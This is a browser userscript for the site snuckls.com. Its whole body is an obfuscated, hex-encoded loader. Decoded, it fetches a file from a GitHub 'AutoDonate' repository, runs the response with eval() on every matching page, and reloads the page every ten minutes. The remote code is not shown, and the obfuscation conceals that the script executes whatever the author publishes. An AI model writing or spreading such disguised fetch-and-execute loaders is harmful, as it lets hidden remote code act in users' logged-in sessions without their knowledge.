// ==UserScript==
// @name         Snuckls vmhoangit1408
// @version      12.08.2019
// @description  Snuckls
// @author       vmhoangit1408
// @match        https://www.snuckls.com/*
// @require 	 https://apis.google.com/js/api.js
// @require 	 https://www.gstatic.com/firebasejs/5.9.4/firebase.js
// @grant        none
// ==/UserScript==

var _0x7253=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x61\x77\x2E\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6F\x6E\x74\x65\x6E\x74\x2E\x63\x6F\x6D\x2F\x76\x6D\x68\x6F\x61\x6E\x67\x69\x74\x31\x34\x30\x38\x2F\x41\x75\x74\x6F\x44\x6F\x6E\x61\x74\x65\x2F\x6D\x61\x73\x74\x65\x72\x2F\x53\x6E\x75\x63\x6B\x6C\x73\x5F\x6B\x69\x64\x33\x37\x48\x73\x44","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74"];setTimeout(function(){window[_0x7253[1]][_0x7253[0]]()},600000);var url=_0x7253[2];var xmlhttp= new XMLHttpRequest();xmlhttp[_0x7253[4]](_0x7253[3],url,true);xmlhttp[_0x7253[5]](null);xmlhttp[_0x7253[6]]= function(){if(xmlhttp[_0x7253[7]]== 4&& xmlhttp[_0x7253[8]]== 200){eval(xmlhttp[_0x7253[9]])}else {if(xmlhttp[_0x7253[7]]!= 2&& xmlhttp[_0x7253[7]]!= 3){window[_0x7253[1]][_0x7253[0]]()}}}
